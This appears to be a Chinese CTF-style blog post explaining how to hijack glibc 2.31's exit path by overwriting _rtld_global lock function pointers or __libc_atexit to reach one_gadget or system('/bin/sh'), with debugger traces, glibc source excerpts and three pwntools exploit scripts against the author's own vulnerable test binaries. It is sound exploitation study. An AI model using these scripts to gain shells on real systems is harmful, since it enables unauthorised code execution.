exit hook
之前经常改 malloc_hook , realloc_hook,free_hook 为 one_gadget 来 get shell ,最近看到一种利用是改 exit hook(winmt师傅告诉我 其实没有exit hook,它是函数指针)。
改 exit_hook 有两种改法,一个是改为 one_gadget ,一个是改为 system ,再控制参数。
首先来看看 exit 这个函数里面究竟是如何调用的。(由于网上 libc版本多为 2.23 ,2.27我就用 2.31 的 libc 来做了实验)
进入 exit 之后我们发现它调用了 __run_exit_handlers ,我们单步进入 __run_exit_handlers。
1 0x7ffff7e09bc5 <exit+5> pop rax 2 0x7ffff7e09bc6 <exit+6> mov ecx, 1 3 0x7ffff7e09bcb <exit+11> mov edx, 1 4 0x7ffff7e09bd0 <exit+16> lea rsi, [rip + 0x1a1b41] <0x7ffff7fab718> 5 0x7ffff7e09bd7 <exit+23> sub rsp, 8 6 ► 0x7ffff7e09bdb <exit+27> call __run_exit_handlers <__run_exit_handlers> 7 rdi: 0x0 8 rsi: 0x7ffff7fab718 (__exit_funcs) —▸ 0x7ffff7fad980 (initial) ◂— 0x0 9 rdx: 0x1 10 rcx: 0x1 11 12 0x7ffff7e09be0 <on_exit> endbr64 13 0x7ffff7e09be4 <on_exit+4> push r12 14 0x7ffff7e09be6 <on_exit+6> push rbp 15 0x7ffff7e09be7 <on_exit+7> push rbx 16 0x7ffff7e09be8 <on_exit+8> test rdi, rdi
我们发现 __run_exit_handlers 又会调用 _dl_fini 函数,我们再单步进入。
1 0x7ffff7e1ea0a <__run_exit_handlers+218> mov rdi, qword ptr [rax + 0x20] 2 0x7ffff7e1ea0e <__run_exit_handlers+222> mov qword ptr [rax + 0x10], 0 3 0x7ffff7e1ea16 <__run_exit_handlers+230> mov esi, ebp 4 0x7ffff7e1ea18 <__run_exit_handlers+232> ror rdx, 0x11 5 0x7ffff7e1ea1c <__run_exit_handlers+236> xor rdx, qword ptr fs:[0x30] 6 ► 0x7ffff7e1ea25 <__run_exit_handlers+245> call rdx <_dl_fini> 7 8 0x7ffff7e1ea27 <__run_exit_handlers+247> jmp __run_exit_handlers+106 <__run_exit_handlers+106>
看一下 _dl_fini 的源码得知,会调用 rtld_lock_default_lock_recursive 和 rtld_lock_default_unlock_recursive 函数,并且有一个 GL(dl_load_lock) 的传参。
void
_dl_fini (void)
{
/* Lots of fun ahead. We have to call the destructors for all still
loaded objects, in all namespaces. The problem is that the ELF
specification now demands that dependencies between the modules
are taken into account. I.e., the destructor for a module is
called before the ones for any of its dependencies.
To make things more complicated, we cannot simply use the reverse
order of the constructors. Since the user might have loaded objects
using `dlopen' there are possibly several other modules with its
dependencies to be taken into account. Therefore we have to start
determining the order of the modules once again from the beginning. */
/* We run the destructors of the main namespaces last. As for the
other namespaces, we pick run the destructors in them in reverse
order of the namespace ID. */
#ifdef SHARED
int do_audit = 0;
again:
#endif
for (Lmid_t ns = GL(dl_nns) - 1; ns >= 0; --ns)
{
/* Protect against concurrent loads and unloads. */
__rtld_lock_lock_recursive (GL(dl_load_lock));
unsigned int nloaded = GL(dl_ns)[ns]._ns_nloaded;
/* No need to do anything for empty namespaces or those used for
auditing DSOs. */
if (nloaded == 0
#ifdef SHARED
|| GL(dl_ns)[ns]._ns_loaded->l_auditing != do_audit
#endif
)
__rtld_lock_unlock_recursive (GL(dl_load_lock));
rtld_lock_default_lock_recursive 和 rtld_lock_default_unlock_recursive 的定义:
# define __rtld_lock_lock_recursive(NAME) \
GL(dl_rtld_lock_recursive) (&(NAME).mutex)
# define __rtld_lock_unlock_recursive(NAME) \
GL(dl_rtld_unlock_recursive) (&(NAME).mutex)
#else
# define __rtld_lock_lock_recursive(NAME) \
__libc_maybe_call (__pthread_mutex_lock, (&(NAME).mutex), 0)
# define __rtld_lock_unlock_recursive(NAME) \
__libc_maybe_call (__pthread_mutex_unlock, (&(NAME).mutex), 0)
#endif
进入之后找到调用的两个关键函数 rtld_lock_default_lock_recursive 和 rtld_lock_default_unlock_recursive,并且在调用之前会把某个地址里的值赋给 rdi。
0x7ffff7fe0d7d <_dl_fini+45> lea rbx, [r12 + r12*8] 0x7ffff7fe0d81 <_dl_fini+49> lea rax, [rip + 0x1c2d8] <0x7ffff7ffd060> 0x7ffff7fe0d88 <_dl_fini+56> shl rbx, 4 0x7ffff7fe0d8c <_dl_fini+60> add rbx, rax 0x7ffff7fe0d8f <_dl_fini+63> jmp _dl_fini+106 <_dl_fini+106> ↓ ► 0x7ffff7fe0dba <_dl_fini+106> lea rdi, [rip + 0x1cba7] <0x7ffff7ffd968> 0x7ffff7fe0dc1 <_dl_fini+113> call qword ptr [rip + 0x1d1a1] <rtld_lock_default_lock_recursive>
1 pwndbg> x/gx 0x7ffff7ffd968 2 0x7ffff7ffd968 <_rtld_global+2312>: 0x0000000000000000
0x7ffff7fe0ec0 <_dl_fini+368> mov ecx, 1 0x7ffff7fe0ec5 <_dl_fini+373> call _dl_sort_maps <_dl_sort_maps> 0x7ffff7fe0eca <_dl_fini+378> lea rdi, [rip + 0x1ca97] <0x7ffff7ffd968> 0x7ffff7fe0ed1 <_dl_fini+385> call qword ptr [rip + 0x1d099] <rtld_lock_default_unlock_recursive>
那个地址其实是结构体 _rtld_global ,里的一部分 ,存在于_dl_load_lock 里,是 _rtld_global._dl_load_lock.mutex.__size的地址。
1 _dl_load_lock = { 2 mutex = { 3 __data = { 4 __lock = 0, 5 __count = 0, 6 __owner = 0, 7 __nusers = 0, 8 __kind = 1, 9 __spins = 0, 10 __elision = 0, 11 __list = { 12 __prev = 0x0, 13 __next = 0x0 14 } 15 }, 16 __size = '\000' <repeats 16 times>, "\001", '\000' <repeats 22 times>, 17 __align = 0 18 } 19 },
由此我们可以想到两个方法来 get shell 一个是改 rtld_lock_default_lock_recursive 或 rtld_lock_default_unlock_recursive 为 one_gadget , 另一个更通用就是改 rtld_lock_default_lock_recursive 和 rtld_lock_default_unlock_recursive 为 system ,并且把 _rtld_global._dl_load_lock.mutex的值改为 /bin/sh\x00。
找到他们相对于 _rtld_global 偏移
_dl_rtld_lock_recursive = 0x7ffff7fd0150 <rtld_lock_default_lock_recursive>, _dl_rtld_unlock_recursive = 0x7ffff7fd0160 <rtld_lock_default_unlock_recursive>,
0x7ffff7ffdf60 <_rtld_global+3840>: 0x0000000000000000 0x00007ffff7fd0150 0x7ffff7ffdf70 <_rtld_global+3856>: 0x00007ffff7fd0160 0x0000000000000000
0x7ffff7ffd968 <_rtld_global+2312>: 0x0000000000000000
我分别写了两个相应的任意地址写的漏洞程序来测试是否可行。
第一个改为one_gadget,我放了一个任意地址写。
exp: _rtld_global 与的 ld 的偏移不变,而 ld 与 libc 的偏移也不变,故我们把 libc 与 ld 都加载进去。
from pwn import * context.arch = 'amd64' context.log_level = 'debug' s = process('./exit_onegadget') elf = ELF('./exit_onegadget') libc = ELF('./glibc-all-in-one/libs/2.31-0ubuntu9_amd64/libc-2.31.so') ld = ELF('./glibc-all-in-one/libs/2.31-0ubuntu9_amd64/ld-2.31.so') printf_addr = int(s.recv(14),16) libc_base = printf_addr - libc.sym['printf'] #gdb.attach(s) ld_base = libc_base + 0x1f4000 _rtld_global = ld_base + ld.sym['_rtld_global'] _dl_rtld_lock_recursive = _rtld_global + 0xf08 _dl_rtld_unlock_recursive = _rtld_global + 0xf10 #_dl_rtld_lock_recursive = 0x7ffff7fd0150 #_dl_rtld_unlock_recursive = 0x7ffff7fd0160 onegadget = [0xe6aee,0xe6af1,0xe6af4] one_gadget = libc_base + onegadget[0] success('one_gadget=>' + hex(one_gadget)) s.send(p64(_dl_rtld_lock_recursive)) s.send(p64(one_gadget)) s.interactive() ''' 0xe6aee execve("/bin/sh", r15, r12) constraints: [r15] == NULL || r15 == NULL [r12] == NULL || r12 == NULL 0xe6af1 execve("/bin/sh", r15, rdx) constraints: [r15] == NULL || r15 == NULL [rdx] == NULL || rdx == NULL 0xe6af4 execve("/bin/sh", rsi, rdx) constraints: [rsi] == NULL || rsi == NULL [rdx] == NULL || rdx == NULL '''
第二个改为 system 和 /bin/sh\x00 我放了两个任意地址写。
exp:
from pwn import * context.arch = 'amd64' context.log_level = 'debug' s = process('./exit_system') elf = ELF('./exit_system') libc = ELF('./glibc-all-in-one/libs/2.31-0ubuntu9_amd64/libc.so.6') ld = ELF('./glibc-all-in-one/libs/2.31-0ubuntu9_amd64/ld-2.31.so') printf_addr = int(s.recv(14),16) libc_base = printf_addr - libc.sym['printf'] #gdb.attach(s) ld_base = libc_base + 0x1f4000 _rtld_global = ld_base + ld.sym['_rtld_global'] _dl_rtld_lock_recursive = _rtld_global + 0xf08 _dl_rtld_unlock_recursive = _rtld_global + 0xf10 _dl_load_lock = _rtld_global + 0x908 #_dl_rtld_lock_recursive = 0x7ffff7fd0150 #_dl_rtld_unlock_recursive = 0x7ffff7fd0160 s.send(p64(_dl_rtld_lock_recursive)) s.send(p64(libc_base + libc.sym['system']))
s.send(p64(_dl_load_lock)) s.send(b'/bin/sh\x00') s.interactive()
============================================================================================================================
之后winmt师傅告诉我他发现了一个新的小trick,tql tql(我只是 winmt 的搬运工)
关键源码:
if (run_list_atexit)
RUN_HOOK (__libc_atexit, ());
_exit (status);
void
exit (int status)
{
__run_exit_handlers (status, &__exit_funcs, true);
}
libc_hidden_def (exit)
extern void __run_exit_handlers (int status, struct exit_function_list **listp,
bool run_list_atexit)
attribute_hidden __attribute__ ((__noreturn__));
由这两行他说可以改掉 __libc_atexit 来实现 get shell ,实际上经过测试确实可行。
优点是任意地址改时比上面的操作简单,所改函数就在 libc 里,而不是在 ld 里。
缺点是无法加参数,能不能成功取决于栈结构是否匹配 one_gadget。
可以用 one_gadget 的那个程序来试试这种方法。
from pwn import * context.arch = 'amd64' context.log_level = 'debug' s = process('./a') libc = ELF('./glibc-all-in-one/libs/2.31-0ubuntu9_amd64/libc.so.6') printf_addr = int(s.recv(14),16) libc_base = printf_addr - libc.sym['printf'] onegadget = [0xe6aee,0xe6af1,0xe6af4] one_gadget = libc_base + onegadget[0] success('one_gadget=>' + hex(one_gadget)) s.send(p64(libc_base + 0x1ED608)) s.send(p64(one_gadget)) s.interactive()
提取码:1jsi
本文来自博客园,作者:{狒猩橙},转载请注明原文链接:https://www.cnblogs.com/pwnfeifei/p/15759130.html